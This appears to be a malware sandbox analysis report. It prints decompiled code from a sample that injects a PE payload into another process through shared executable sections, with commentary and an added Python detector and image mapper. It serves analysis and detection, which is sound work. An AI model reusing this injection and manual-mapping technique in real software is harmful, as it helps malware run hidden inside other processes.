                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
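The seven calls above are the whole injection primitive, and none of them touch VirtualAllocEx, WriteProcessMemory or VirtualProtectEx in the target. The first NtCreateSection (DesiredAccess 6 = SECTION_MAP_WRITE|SECTION_MAP_READ, PAGE_READWRITE, SEC_COMMIT, 0x5000 bytes per the C listing) is mapped into the current process (ProcessHandle -1, rendered here as 000000FF; the C code shows 0xffffffff at the same site) and into the duplicated target handle, and holds the parameter block. The second NtCreateSection (DesiredAccess 0xE adds SECTION_MAP_EXECUTE, PAGE_EXECUTE_READWRITE, SEC_COMMIT) is mapped locally as PAGE_READWRITE (4) so the payload can be written through the local view, and remotely as PAGE_EXECUTE_READ (0x20) so it can run in the target. The Python below is an added example, not part of the report or of the sample: it parses lines in this report's API format and flags a create/local-map/foreign-map triple for any executable section. Because the sandbox logs section handles as `?`, calls are paired by order until the next NtCreateSection, which is a heuristic; a host-based rule would key on the returned section handle instead. The input is the seven lines above, embedded as constructed sample text.

```python
"""Flag section double-mapping (create executable section, map it into self to
write, map it into a foreign process to execute) in a Joe Sandbox style API
list.  Added example; the input below is constructed from the report lines."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the seven API lines the report lists for this function.
SAMPLE_API_LINES = """\
NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
"""

SEC_COMMIT = 0x08000000
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80      # PAGE_EXECUTE .. PAGE_EXECUTE_WRITECOPY
# NtCurrentProcess() is the pseudo-handle -1; this report renders that argument as
# 000000FF (the C listing shows 0xffffffff for the same call site).
SELF_HANDLES = {0xFF, 0xFFFFFFFF}
PROTECT_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

_LINE = re.compile(r"^\s*•?\s*(\w+)\.NTDLL\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    args: list      # int for logged values, None where the sandbox printed '?'
    ref: str        # call-site address as printed in the report


@dataclass
class Finding:
    create_ref: str
    local_map_ref: str
    remote_map_ref: str
    section_protect: int
    remote_protect: int


def parse_api_line(line: str) -> Optional[ApiCall]:
    """One report line -> ApiCall, or None if the line is not an API entry."""
    m = _LINE.match(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a.strip(), 16) for a in m.group(2).split(",")]
    return ApiCall(m.group(1), args, m.group(3).upper())


def find_section_injection(text: str) -> list:
    """Pair each executable SEC_COMMIT NtCreateSection with the NtMapViewOfSection
    calls that follow it before the next NtCreateSection: one view in the current
    process (payload is written there) and one in another process with an
    executable Win32Protect (payload runs there).  Pairing is by order because
    section handles are '?' in the trace."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    findings = []
    for i, c in enumerate(calls):
        if c.name != "NtCreateSection" or len(c.args) < 6:
            continue
        protect, attrs = c.args[4], c.args[5]          # SectionPageProtection, AllocationAttributes
        if protect is None or not protect & PAGE_EXECUTE_ANY or attrs != SEC_COMMIT:
            continue
        local = remote = None
        for v in calls[i + 1:]:
            if v.name == "NtCreateSection":
                break
            if v.name != "NtMapViewOfSection" or len(v.args) < 10:
                continue
            if v.args[1] in SELF_HANDLES:                 # ProcessHandle == NtCurrentProcess()
                local = v
            elif v.args[9] is not None and v.args[9] & PAGE_EXECUTE_ANY:   # Win32Protect
                remote = v
        if local and remote:
            findings.append(Finding(c.ref, local.ref, remote.ref, protect, remote.args[9]))
    return findings


def describe(f: Finding) -> str:
    sec = PROTECT_NAMES.get(f.section_protect, hex(f.section_protect))
    rem = PROTECT_NAMES.get(f.remote_protect, hex(f.remote_protect))
    return (f"NtCreateSection@{f.create_ref} {sec}|SEC_COMMIT -> local view @{f.local_map_ref}, "
            f"foreign view @{f.remote_map_ref} mapped {rem}")


if __name__ == "__main__":
    for finding in find_section_injection(SAMPLE_API_LINES):
        print(describe(finding))
```

On the seven lines above this reports exactly one finding, the section created at 0040173F with its local view at 00401770 and its foreign PAGE_EXECUTE_READ view at 00401792; the PAGE_READWRITE section at 004016BD is not flagged because it never becomes executable.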
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                            • Instruction ID: f98827d68b3176c6101587f3b7b5f45d89ccd4612d0ba3f6c5a6805aca786af7
                            • Opcode Fuzzy Hash: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                            • Instruction Fuzzy Hash: 0B614CB4A00205BBEB209F95CC49FEF7BB8EF81B00F14012AF912BA1E5D6759945DB25
                            Uniqueness

                            Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as: id, address range, calls made, successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text)

• 47: 4015d4-4015ef -> 51, 52
• 51: 401603 -> 52
• 52: 4015f4-40162b, call 401274 -> 59, 60
• 59: 401630-401635 -> 62, 63
• 60: 40162d -> 59
• 62: 401956-40195e -> 59, 66
• 63: 40163b-40164c -> 67, 68
• 66: 401963-4019b3, call 401274
• 67: 401652-40167b -> 68, 75
• 68: 401954 -> 66
• 75: 401681-401698, NtDuplicateObject -> 68, 77
• 77: 40169e-4016c2, NtCreateSection -> 79, 80
• 79: 4016c4-4016e5, NtMapViewOfSection -> 80, 83
• 80: 40171e-401744, NtCreateSection -> 68, 84
• 83: 4016e7-401703, NtMapViewOfSection -> 80, 85
• 84: 40174a-40174e -> 68, 86
• 85: 401705-40171b -> 80
• 86: 401754-401775, NtMapViewOfSection -> 68, 89
• 89: 40177b-401797, NtMapViewOfSection -> 68, 92
• 92: 40179d, call 4017a2
                            C-Code - Quality: 55%
                            			E004015D4(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				long _v12;
                            				void* _v16;
                            				void* _v20;
                            				char _v44;
                            				char _v52;
                            				long _v56;
                            				long _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				intOrPtr _v96;
                            				char _v100;
                            				char _v119;
                            				void* __ebx;
                            				void* __esi;
                            				intOrPtr _t90;
                            				void* _t93;
                            				intOrPtr _t94;
                            				struct _GUID _t101;
                            				struct _GUID _t103;
                            				PVOID* _t105;
                            				PVOID* _t107;
                            				intOrPtr* _t111;
                            				PVOID* _t124;
                            				PVOID* _t126;
                            				intOrPtr _t131;
                            				void** _t135;
                            				signed int _t142;
                            				int _t143;
                            				void* _t161;
                            				signed int _t165;
                            				signed int _t166;
                            				signed int _t167;
                            				signed int _t168;
                            				signed int _t169;
                            				void* _t170;
                            				intOrPtr* _t171;
                            				void* _t174;
                            				intOrPtr _t185;
                            				void* _t186;
                            				void* _t187;
                            				void* _t192;
                            				HANDLE* _t193;
                            				HANDLE* _t195;
                            				void* _t200;
                            				intOrPtr* _t203;
                            				intOrPtr _t206;
                            				void* _t210;
                            				void* _t211;
                            				intOrPtr* _t212;
                            				void* _t216;
                            				intOrPtr _t217;
                            				long _t231;
                            
                            				_t1 =  &_v119;
                            				 *_t1 = _v119 + __edx;
                            				_t217 =  *_t1;
                            				_t211 = _t210 - 0x60;
                            				_push(_t192);
                            				_push(0x392);
                            				_t212 = _t211 + 4;
                            				L00401274(0x161d, 0xf1, _t192, _t217);
                            				_t131 = _a4;
                            				_v56 = 0;
                            				if(gs != 0) {
                            					_v56 = _v56 + 1;
                            				}
                            				while(1) {
                            					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
                            					if(_t90 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                            				}
                            				_v96 = _t90;
                            				_t193 =  &_v100;
                            				 *_t193 = 0;
                            				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t193);
                            				_t93 =  *_t193;
                            				if(_t93 != 0) {
                            					_t135 =  &_v52;
                            					 *_t135 = _t93;
                            					_t135[1] = 0;
                            					_t193 =  &_v44;
                            					 *((intOrPtr*)(_t131 + 0x10))(_t193, 0x18);
                            					 *_t193 = 0x18;
                            					_push( &_v52);
                            					_push(_t193);
                            					_push(0x40);
                            					_push( &_v20);
                            					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                            						_v12 = 0;
                            						_t101 =  &_v84;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 = 0x5000;
                            						_t195 =  &_v88;
                            						if(NtCreateSection(_t195, 6, 0, _t101, 4, 0x8000000, 0) == 0) {
                            							_push(_v84);
                            							_pop( *_t27);
                            							_t124 =  &_v72;
                            							 *_t124 = 0;
                            							if(NtMapViewOfSection( *_t195, 0xffffffff, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                            								_t126 =  &_v64;
                            								 *_t126 = 0;
                            								if(NtMapViewOfSection( *_t195, _v16, _t126, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                            									_t206 = _v72;
                            									 *((intOrPtr*)(_t131 + 0x20))(0, _t206, 0x104);
                            									 *((intOrPtr*)(_t206 + 0x208)) = _a16;
                            									_v12 = _v12 + 1;
                            								}
                            							}
                            						}
                            						_t103 =  &_v84;
                            						 *((intOrPtr*)(_t103 + 4)) = 0;
                            						 *_t103 = _a12 + 0x10000;
                            						_t193 =  &_v92;
                            						if(NtCreateSection(_t193, 0xe, 0, _t103, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
                            							_push(_v84);
                            							_pop( *_t48);
                            							_t105 =  &_v76;
                            							 *_t105 = 0;
                            							if(NtMapViewOfSection( *_t193, 0xffffffff, _t105, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                            								_t107 =  &_v68;
                            								 *_t107 = 0;
                            								_t231 = NtMapViewOfSection( *_t193, _v16, _t107, 0, 0, 0,  &_v60, 1, 0, 0x20);
                            								if(_t231 == 0) {
                            									L25();
                            									if(_t231 == 0 && _t231 != 0) {
                            										asm("hlt");
                            										_push(_t212);
                            									}
                            									_push(0x2ea6);
                            									_t216 = _t212 + 4;
                            									_t165 = 0x2260;
                            									_t166 = _t165 << 5;
                            									_t167 = _t166 + 0x2260;
                            									asm("lodsb");
                            									_t168 = _t167;
                            									asm("loop 0xffffffc4");
                            									_t169 = _t168 ^ 0xad610a21;
                            									_t212 = _t216 - _t169;
                            									_t200 = _a8 +  *_a8;
                            									_t142 =  *(_t200 + 6) & 0x0000ffff;
                            									_push(_t200);
                            									_t170 = _t200;
                            									if(_v56 == 0) {
                            										_t171 = _t170 + 0xf8;
                            										__eflags = _t171;
                            									} else {
                            										_t171 = _t170 + 0x108;
                            									}
                            									_push(_t142);
                            									_t143 =  *(_t171 + 0x10);
                            									if(_t143 != 0) {
                            										memcpy( *((intOrPtr*)(_t171 + 0xc)) + _v76,  *((intOrPtr*)(_t171 + 0x14)) + _a8, _t143);
                            										_t212 = _t212 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t193);
                            									_t235 = _v56;
                            									if(_v56 == 0) {
                            										_push(_t193);
                            										_t174 = _t193[0xd] - _v68;
                            										_t203 = _t193[0x28] + _v76;
                            										__eflags = _t203;
                            										while(1) {
                            											__eflags =  *_t203;
                            											if( *_t203 == 0) {
                            												break;
                            											}
                            											_t185 =  *_t203;
                            											_t203 = _t203 + 8;
                            											asm("lodsw");
                            											__eflags = 0;
                            											if(0 != 0) {
                            												 *0x00000000 =  *0x00000000 - _t174;
                            												__eflags =  *((intOrPtr*)(0 + _v76 + _t185));
                            											}
                            											asm("loop 0xffffffe9");
                            										}
                            										_pop(_t193);
                            										__eflags = 0;
                            										_t111 =  &_v8;
                            										 *_t111 = 0;
                            										 *((intOrPtr*)(_t131 + 0x98))(_v16, 0, 0, 0, 0, 0, _t193[0xa] + _v68, _v64, _t111, 0);
                            									} else {
                            										L58();
                            										_pop(_t186);
                            										_t187 = _t186 - 0x1892;
                            										 *((intOrPtr*)(_t187 + 0x18c6)) = _t187 + 0x304c;
                            										L004012E3(_t131, _t235);
                            										0x33(_t187 + 0x304c, 0x1ad);
                            										 *((intOrPtr*)(_t187 + 0x18eb)) = _t187 + 0x309c;
                            										0x33();
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_push(0x161d);
                            				_t94 =  *_t212;
                            				_push(0x392);
                            				_t161 = 0xf1;
                            				return L00401274(_t94, _t161, _t193, _t235);
                            			}
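The tail of E004015D4 (the same code is listed above as E004015F4 and below as E004015EA, which are alternative entry points into it) is a hand-rolled PE mapper working on the two views of the executable section. `_t200 = _a8 + *_a8` takes the first dword of the payload blob as the offset to the PE signature (a normal image keeps that at 0x3c), `*(_t200 + 6) & 0xffff` is FileHeader.NumberOfSections, and the section table is taken 0xf8 past the signature when `_v56` is 0 and 0x108 when it is 1: 0x18 plus the 0xe0 optional header of a PE32 image versus the 0xf0 of a PE32+ image, so the `gs != 0` test, which is a decompiler rendering of a segment-register check commonly used to tell a WoW64 process from a native 32-bit one, selects between a 32-bit and a 64-bit payload. The `memcpy` copies SizeOfRawData (+0x10) bytes from PointerToRawData (+0x14) to VirtualAddress (+0xc) inside the local view `_v76`, and the `while` loop walks the base-relocation directory (+0xa0 past the signature) until a block whose VirtualAddress is 0, moving each entry by the difference between the remote view `_v68` and ImageBase (+0x34). The final indirect call through `_t131 + 0x98` receives the duplicated target handle `_v16`, AddressOfEntryPoint (+0x28) plus `_v68`, and the remote view of the parameter block `_v64`; its ten arguments have the shape of a thread-creation routine, which matches the thread-injection signature in the summary, but the callee's name is not recoverable from this listing. The `L25()`, `hlt`, `lodsb`, `loop` and xor sequence between the last NtMapViewOfSection and `_t200 = _a8 + *_a8` is filler the decompiler could not resolve, and the `0x33(...)` calls in the 64-bit branch appear to be far calls through segment selector 0x33, the 64-bit code segment under WoW64. The Python below is an added example, not the sample's code and not from Joe Sandbox: `build_sample_pe`, `map_image` and `apply_relocations` are names chosen here, the PE32 input is constructed in the block, and it generalises the listing by deriving the section-table offset from SizeOfOptionalHeader instead of the `gs` test, by also handling PE32+ DIR64 entries, and by reading the signature offset from the standard 0x3c slot (pass `nt_offset_field=0` for a blob laid out like the sample's).

```python
"""Rebuild an image the way the section-copy and relocation loop in
E004015D4 does.  Added example; the PE32 input is constructed below."""
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, nothing to patch
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address
IMAGE_REL_BASED_DIR64 = 10     # 64-bit absolute address (PE32+)


def read_u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def read_u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def build_sample_pe(image_base=0x400000):
    """Constructed minimal PE32: headers, a .text section whose code holds one
    absolute address (image_base + 0x1010), and a .reloc section covering it."""
    text_rva, reloc_rva, entry_rva, raw_size = 0x1000, 0x2000, 0x1000, 0x200
    text_raw, reloc_raw = 0x200, 0x400
    # mov eax, imm32 ; ret  -- the imm32 is an absolute address and must be relocated
    code = (b"\xb8" + struct.pack("<I", image_base + 0x1010) + b"\xc3").ljust(raw_size, b"\x00")
    # One IMAGE_BASE_RELOCATION block: VirtualAddress, SizeOfBlock, a HIGHLOW entry for
    # offset 1 and an ABSOLUTE padding entry; the zero fill after it terminates the walk.
    reloc = (struct.pack("<II", text_rva, 12)
             + struct.pack("<HH", (IMAGE_REL_BASED_HIGHLOW << 12) | 1, 0)).ljust(raw_size, b"\x00")
    nt = 0x40
    dos = b"MZ".ljust(0x3C, b"\x00") + struct.pack("<I", nt)              # e_lfanew at 0x3c
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # i386, 2 sections
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                   # Magic: PE32
    struct.pack_into("<I", opt, 0x10, entry_rva)               # AddressOfEntryPoint (signature + 0x28)
    struct.pack_into("<I", opt, 0x1C, image_base)              # ImageBase           (signature + 0x34)
    struct.pack_into("<I", opt, 0x38, 0x3000)                  # SizeOfImage
    struct.pack_into("<I", opt, 0x5C, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 5 * 8, reloc_rva, 12)  # DataDirectory[5]   (signature + 0xa0)

    def section(name, va, raw_ptr):
        return struct.pack("<8sIIIIIIHHI", name, raw_size, va, raw_size, raw_ptr, 0, 0, 0, 0, 0)

    headers = (dos + b"PE\0\0" + file_hdr + bytes(opt)
               + section(b".text", text_rva, text_raw) + section(b".reloc", reloc_rva, reloc_raw))
    return headers.ljust(text_raw, b"\x00") + code + reloc


def apply_relocations(image, reloc_rva, delta):
    """Walk IMAGE_BASE_RELOCATION blocks until one with VirtualAddress 0, the same
    stop condition as the sample's `while (*_t195 != 0)`, patching each entry."""
    pos, patched = reloc_rva, 0
    while pos + 8 <= len(image):
        page_rva, block_size = struct.unpack_from("<II", image, pos)
        if page_rva == 0 or block_size < 8:
            break
        for off in range(pos + 8, pos + block_size, 2):
            entry = read_u16(image, off)
            kind, target = entry >> 12, page_rva + (entry & 0xFFF)
            if kind == IMAGE_REL_BASED_HIGHLOW:
                struct.pack_into("<I", image, target, (read_u32(image, target) + delta) & 0xFFFFFFFF)
                patched += 1
            elif kind == IMAGE_REL_BASED_DIR64:
                val = struct.unpack_from("<Q", image, target)[0]
                struct.pack_into("<Q", image, target, (val + delta) & 0xFFFFFFFFFFFFFFFF)
                patched += 1
        pos += block_size
    return patched


def map_image(blob, new_base, nt_offset_field=0x3C):
    """Copy sections to their VirtualAddress and rebase the image to new_base.
    Returns (image bytes, entry point address, number of relocations applied)."""
    nt = read_u32(blob, nt_offset_field)        # the sample reads this from offset 0 of its blob
    if blob[nt:nt + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    num_sections = read_u16(blob, nt + 6)       # FileHeader.NumberOfSections
    opt_size = read_u16(blob, nt + 0x14)        # FileHeader.SizeOfOptionalHeader
    magic = read_u16(blob, nt + 0x18)
    entry_rva = read_u32(blob, nt + 0x28)
    size_of_image = read_u32(blob, nt + 0x50)
    if magic == 0x10B:                          # PE32
        image_base, reloc_rva = read_u32(blob, nt + 0x34), read_u32(blob, nt + 0xA0)
    elif magic == 0x20B:                        # PE32+
        image_base, reloc_rva = struct.unpack_from("<Q", blob, nt + 0x30)[0], read_u32(blob, nt + 0xB0)
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    # 0x18 + 0xe0 = 0xf8 (PE32) or 0x18 + 0xf0 = 0x108 (PE32+): the two constants in the listing
    sec_table = nt + 0x18 + opt_size
    image = bytearray(size_of_image)
    for i in range(num_sections):
        hdr = sec_table + 40 * i
        va, raw_size, raw_ptr = struct.unpack_from("<III", blob, hdr + 0x0C)   # +0xc, +0x10, +0x14
        if va + raw_size > size_of_image:
            raise ValueError("section %d outside SizeOfImage" % i)
        if raw_size:
            image[va:va + raw_size] = blob[raw_ptr:raw_ptr + raw_size]
    patched = apply_relocations(image, reloc_rva, new_base - image_base) if reloc_rva else 0
    return bytes(image), new_base + entry_rva, patched


if __name__ == "__main__":
    img, entry, n = map_image(build_sample_pe(), 0x7F0000)
    print("entry %#x, %d relocation(s), imm32 now %#x" % (entry, n, read_u32(img, 0x1001)))
```

Run against a memory dump, the same two steps recover the injected module from the local view (sections already at their virtual addresses) and tell you which bytes were patched, which is how to confirm that the image mapped at `_v68` in the target is the payload embedded in `_a8` and not something downloaded later.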

Instruction address column for the listing above (one address per C statement, 0x004015d4 through 0x004019b3; flattened by extraction and no longer aligned with the statements it annotated)

                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                            • Instruction ID: 47c243d31b0f26d8a37b4f88288270fe43ad698e9a2cc1103bbf91406d28765b
                            • Opcode Fuzzy Hash: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                            • Instruction Fuzzy Hash: 92511AB4900245BBEB219F91CC48FEBBFB8FF85700F14012AF912BA2E5D6759945CB24
                            Uniqueness

                            Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as: id, address range, calls made, successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text)

• 94: 4015ea-4015ef -> 98, 99
• 98: 401603 -> 99
• 99: 4015f4-40162b, call 401274 -> 106, 107
• 106: 401630-401635 -> 109, 110
• 107: 40162d -> 106
• 109: 401956-40195e -> 106, 113
• 110: 40163b-40164c -> 114, 115
• 113: 401963-4019b3, call 401274
• 114: 401652-40167b -> 115, 122
• 115: 401954 -> 113
• 122: 401681-401698, NtDuplicateObject -> 115, 124
• 124: 40169e-4016c2, NtCreateSection -> 126, 127
• 126: 4016c4-4016e5, NtMapViewOfSection -> 127, 130
• 127: 40171e-401744, NtCreateSection -> 115, 131
• 130: 4016e7-401703, NtMapViewOfSection -> 127, 132
• 131: 40174a-40174e -> 115, 133
• 132: 401705-40171b -> 127
• 133: 401754-401775, NtMapViewOfSection -> 115, 136
• 136: 40177b-401797, NtMapViewOfSection -> 115, 139
• 139: 40179d, call 4017a2
                            C-Code - Quality: 58%
                            			E004015EA(void* __esi, void* __eflags) {
                            				intOrPtr _t88;
                            				void* _t91;
                            				intOrPtr _t92;
                            				struct _GUID _t99;
                            				struct _GUID _t101;
                            				PVOID* _t103;
                            				PVOID* _t105;
                            				intOrPtr* _t109;
                            				PVOID* _t122;
                            				PVOID* _t124;
                            				intOrPtr _t128;
                            				void** _t132;
                            				signed int _t139;
                            				int _t140;
                            				void* _t157;
                            				signed int _t161;
                            				signed int _t162;
                            				signed int _t163;
                            				signed int _t164;
                            				signed int _t165;
                            				void* _t166;
                            				intOrPtr* _t167;
                            				void* _t170;
                            				intOrPtr _t180;
                            				void* _t181;
                            				void* _t182;
                            				HANDLE* _t188;
                            				HANDLE* _t190;
                            				void* _t195;
                            				intOrPtr* _t198;
                            				void* _t201;
                            				void* _t202;
                            				void* _t204;
                            				intOrPtr* _t205;
                            				void* _t209;
                            				long _t224;
                            
                            				asm("aad 0x6b");
                            				_push(0x392);
                            				_t205 = _t204 + 4;
                            				L00401274(0x161d, 0xf1, __esi, __eflags);
                            				_t128 =  *((intOrPtr*)(_t202 + 8));
                            				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                            				if(gs != 0) {
                            					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                            				}
                            				while(1) {
                            					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                            					if(_t88 != 0) {
                            						break;
                            					}
                            					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                            				}
                            				 *((intOrPtr*)(_t202 - 0x5c)) = _t88;
                            				_t188 = _t202 - 0x60;
                            				 *_t188 = 0;
                            				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t188);
                            				_t91 =  *_t188;
                            				if(_t91 != 0) {
                            					_t132 = _t202 - 0x30;
                            					 *_t132 = _t91;
                            					_t132[1] = 0;
                            					_t188 = _t202 - 0x28;
                            					 *((intOrPtr*)(_t128 + 0x10))(_t188, 0x18);
                            					 *_t188 = 0x18;
                            					_push(_t202 - 0x30);
                            					_push(_t188);
                            					_push(0x40);
                            					_push(_t202 - 0x10);
                            					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, 0, 0, 2) == 0) {
                            						 *((intOrPtr*)(_t202 - 8)) = 0;
                            						_t99 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t99 + 4)) = 0;
                            						 *_t99 = 0x5000;
                            						_t190 = _t202 - 0x54;
                            						if(NtCreateSection(_t190, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                            							 *_t25 =  *(_t202 - 0x50);
                            							_t122 = _t202 - 0x44;
                            							 *_t122 = 0;
                            							if(NtMapViewOfSection( *_t190, 0xffffffff, _t122, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t124 = _t202 - 0x3c;
                            								 *_t124 = 0;
                            								if(NtMapViewOfSection( *_t190,  *(_t202 - 0xc), _t124, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            									_t201 =  *(_t202 - 0x44);
                            									 *((intOrPtr*)(_t128 + 0x20))(0, _t201, 0x104);
                            									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                            									 *((intOrPtr*)(_t202 - 8)) =  *((intOrPtr*)(_t202 - 8)) + 1;
                            								}
                            							}
                            						}
                            						_t101 = _t202 - 0x50;
                            						 *((intOrPtr*)(_t101 + 4)) = 0;
                            						 *_t101 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                            						_t188 = _t202 - 0x58;
                            						if(NtCreateSection(_t188, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t202 - 8)) != 0) {
                            							 *_t46 =  *(_t202 - 0x50);
                            							_t103 = _t202 - 0x48;
                            							 *_t103 = 0;
                            							if(NtMapViewOfSection( *_t188, 0xffffffff, _t103, 0, 0, 0, _t202 - 0x38, 1, 0, 4) == 0) {
                            								_t105 = _t202 - 0x40;
                            								 *_t105 = 0;
                            								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t105, 0, 0, 0, _t202 - 0x38, 1, 0, 0x20);
                            								if(_t224 == 0) {
                            									L24();
                            									if(_t224 == 0 && _t224 != 0) {
                            										asm("hlt");
                            										_push(_t205);
                            									}
                            									_push(0x2ea6);
                            									_t209 = _t205 + 4;
                            									_t161 = 0x2260;
                            									_t162 = _t161 << 5;
                            									_t163 = _t162 + 0x2260;
                            									asm("lodsb");
                            									_t164 = _t163;
                            									asm("loop 0xffffffc4");
                            									_t165 = _t164 ^ 0xad610a21;
                            									_t205 = _t209 - _t165;
                            									_t195 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                            									_t139 =  *(_t195 + 6) & 0x0000ffff;
                            									_push(_t195);
                            									_t166 = _t195;
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_t167 = _t166 + 0xf8;
                            										__eflags = _t167;
                            									} else {
                            										_t167 = _t166 + 0x108;
                            									}
                            									_push(_t139);
                            									_t140 =  *(_t167 + 0x10);
                            									if(_t140 != 0) {
                            										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                            										_t205 = _t205 + 0xc;
                            									}
                            									asm("loop 0xffffffe6");
                            									_pop(_t188);
                            									_t228 =  *((intOrPtr*)(_t202 - 0x34));
                            									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                            										_push(_t188);
                            										_t170 = _t188[0xd] -  *(_t202 - 0x40);
